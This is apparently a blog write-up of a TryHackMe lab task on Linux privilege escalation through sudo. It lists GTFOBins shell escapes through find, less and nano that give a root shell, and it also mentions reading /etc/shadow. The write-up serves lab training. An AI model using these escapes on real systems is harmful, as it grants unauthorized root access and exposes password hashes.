Saturday, February 19, 2022

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.
  • Find

    • sudo find . -exec /bin/sh \; -quit

  • Less

    • sudo less /etc/profile
    !/bin/sh

  • nano

    • sudo nano
    ^R^X
    reset; sh 1>&0 2>&0


Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.
at
Labels: , , , , , , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

How to Install PostgreSQL on Debian 12: A Step-by-Step Guide

PostgreSQL, commonly known as Postgres, is a powerful, open-source relational database management system renowned for its advanced features ...